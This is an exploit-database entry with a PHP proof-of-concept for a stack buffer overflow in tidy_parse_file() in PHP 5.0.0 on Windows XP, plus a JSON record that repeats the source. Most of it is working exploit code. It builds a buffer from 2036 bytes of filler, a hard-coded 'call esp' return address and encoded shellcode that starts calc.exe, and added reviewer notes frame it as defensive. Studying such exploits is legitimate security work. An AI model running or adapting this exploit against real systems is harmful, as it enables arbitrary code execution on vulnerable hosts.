ID 1337DAY-ID-24793
Type zdt
Reporter Yakir Wizman
Modified 2016-09-19T00:00:00
Description
Exploit for the PHP platform, in the "local exploits" category
<?php
#############################################################################
## PHP 5.0.0 tidy_parse_file() Buffer Overflow Exploit
## Tested on Windows XP SP3 English
## Download @ http://museum.php.net/php5/php-5.0.0-Win32.zip
## Date: 17/09/2016
## Buffer Overflow
## Bug discovered by Yakir Wizman (https://www.linkedin.com/in/yakirwizman)
## http://www.black-rose.ml
#############################################################################
#
# Reviewer notes (defensive context):
#  - Proof-of-concept for a stack buffer overflow in the tidy extension of the
#    PHP 5.0.0 Win32 build. The page documents only that build on Windows XP
#    SP3; it makes no claim about any other version or platform.
#  - Running it executes a payload inside the PHP process. The author's payload
#    only starts calc.exe (see the CMD=calc note below), i.e. a benign
#    demonstration of code execution. A copy of this script on a production
#    host is worth investigating as an indicator.
#  - Mitigation: PHP 5.0.0 (2004) is long end-of-life; run a supported
#    release. The return address below is hard-coded, so the PoC as written
#    presumably only works against that exact php5ts.dll loaded at its
#    expected base (no ASLR on XP) — confirm before assuming any wider impact.
#
# Buffer layout: 2036 bytes of filler, then a 4-byte saved-return-address
# overwrite, then the payload. The author notes the overwrite value is a
# "call esp" gadget, so execution continues into the payload that sits
# immediately after it on the stack.
$junk = str_repeat("A", 2036); # 2036 x A — filler up to the saved return address
$eip = "\xaf\xc6\x17\x10"; # 0x1017c6af call esp @ php5ts.dll (bytes in little-endian order)
# windows/exec - 144 bytes, Encoder: x86/shikata_ga_nai, EXITFUNC=seh, CMD=calc
# (generator output per the author's note above; 10 lines x 14 bytes + 4 = 144)
$shellcode = "\xdb\xc0\x31\xc9\xbf\x7c\x16\x70\xcc\xd9\x74\x24\xf4\xb1".
"\x1e\x58\x31\x78\x18\x83\xe8\xfc\x03\x78\x68\xf4\x85\x30".
"\x78\xbc\x65\xc9\x78\xb6\x23\xf5\xf3\xb4\xae\x7d\x02\xaa".
"\x3a\x32\x1c\xbf\x62\xed\x1d\x54\xd5\x66\x29\x21\xe7\x96".
"\x60\xf5\x71\xca\x06\x35\xf5\x14\xc7\x7c\xfb\x1b\x05\x6b".
"\xf0\x27\xdd\x48\xfd\x22\x38\x1b\xa2\xe8\xc3\xf7\x3b\x7a".
"\xcf\x4c\x4f\x23\xd3\x53\xa4\x57\xf7\xd8\x3b\x83\x8e\x83".
"\x1f\x57\x53\x64\x51\xa1\x33\xcd\xf5\xc6\xf5\xc1\x7e\x98".
"\xf5\xaa\xf1\x05\xa8\x26\x99\x3d\x3b\xc0\xd9\xfe\x51\x61".
"\xb6\x0e\x2f\x85\x19\x87\xb7\x78\x2f\x59\x90\x7b\xd7\x05".
"\x7f\xe8\x7b\xca";
# Final buffer: filler + return-address overwrite + payload, in that order.
$buffer = $junk.$eip.$shellcode;
# The oversized buffer is passed as the SECOND argument, not as the filename;
# the first, third and fourth arguments are the literal 1.
# NOTE(review): presumably the unchecked copy is in how the 5.0.0 tidy
# extension handles that second (config) argument — confirm against the
# 5.0.0 ext/tidy source rather than relying on this script.
tidy_parse_file(1,$buffer,1,1);
# Author's alternative entry point, left commented out (same arguments).
#tidy_repair_file(1,$buffer,1,1);
?>
{"id": "1337DAY-ID-24793", "lastseen": "2018-01-01T03:05:55", "viewCount": 7, "bulletinFamily": "exploit", "cvss": {"score": 0.0, "vector": "NONE"}, "edition": 2, "enchantments": {"score": {"value": 0.3, "vector": "NONE", "modified": "2018-01-01T03:05:55", "rev": 2}, "dependencies": {"references": [], "modified": "2018-01-01T03:05:55", "rev": 2}, "vulnersScore": 0.3}, "type": "zdt", "sourceHref": "https://0day.today/exploit/24793", "description": "Exploit for php platform in category local exploits", "title": "PHP 5.0.0 - 'tidy_parse_file()' Buffer Overflow", "cvelist": [], "sourceData": "<?php\r\n#############################################################################\r\n## PHP 5.0.0 tidy_parse_file() Buffer Overflow Exploit\r\n## Tested on Windows XP SP3 English\r\n## Download @ http://museum.php.net/php5/php-5.0.0-Win32.zip\r\n## Date: 17/09/2016\r\n## Buffer Overflow\r\n## Bug discovered by Yakir Wizman (https://www.linkedin.com/in/yakirwizman)\r\n## http://www.black-rose.ml\r\n#############################################################################\r\n \r\n$junk = str_repeat(\"A\", 2036); # 2036 x A\r\n$eip = \"\\xaf\\xc6\\x17\\x10\"; # 0x1017c6af call esp @ php5ts.dll\r\n \r\n# windows/exec - 144 bytes, Encoder: x86/shikata_ga_nai, EXITFUNC=seh, CMD=calc\r\n$shellcode = 
\"\\xdb\\xc0\\x31\\xc9\\xbf\\x7c\\x16\\x70\\xcc\\xd9\\x74\\x24\\xf4\\xb1\".\r\n\"\\x1e\\x58\\x31\\x78\\x18\\x83\\xe8\\xfc\\x03\\x78\\x68\\xf4\\x85\\x30\".\r\n\"\\x78\\xbc\\x65\\xc9\\x78\\xb6\\x23\\xf5\\xf3\\xb4\\xae\\x7d\\x02\\xaa\".\r\n\"\\x3a\\x32\\x1c\\xbf\\x62\\xed\\x1d\\x54\\xd5\\x66\\x29\\x21\\xe7\\x96\".\r\n\"\\x60\\xf5\\x71\\xca\\x06\\x35\\xf5\\x14\\xc7\\x7c\\xfb\\x1b\\x05\\x6b\".\r\n\"\\xf0\\x27\\xdd\\x48\\xfd\\x22\\x38\\x1b\\xa2\\xe8\\xc3\\xf7\\x3b\\x7a\".\r\n\"\\xcf\\x4c\\x4f\\x23\\xd3\\x53\\xa4\\x57\\xf7\\xd8\\x3b\\x83\\x8e\\x83\".\r\n\"\\x1f\\x57\\x53\\x64\\x51\\xa1\\x33\\xcd\\xf5\\xc6\\xf5\\xc1\\x7e\\x98\".\r\n\"\\xf5\\xaa\\xf1\\x05\\xa8\\x26\\x99\\x3d\\x3b\\xc0\\xd9\\xfe\\x51\\x61\".\r\n\"\\xb6\\x0e\\x2f\\x85\\x19\\x87\\xb7\\x78\\x2f\\x59\\x90\\x7b\\xd7\\x05\".\r\n\"\\x7f\\xe8\\x7b\\xca\";\r\n \r\n$buffer = $junk.$eip.$shellcode;\r\n \r\ntidy_parse_file(1,$buffer,1,1);\r\n#tidy_repair_file(1,$buffer,1,1);\r\n?>\n\n# 0day.today [2018-01-01] #", "published": "2016-09-19T00:00:00", "references": [], "reporter": "Yakir Wizman", "modified": "2016-09-19T00:00:00", "href": "https://0day.today/exploit/description/24793"}
{}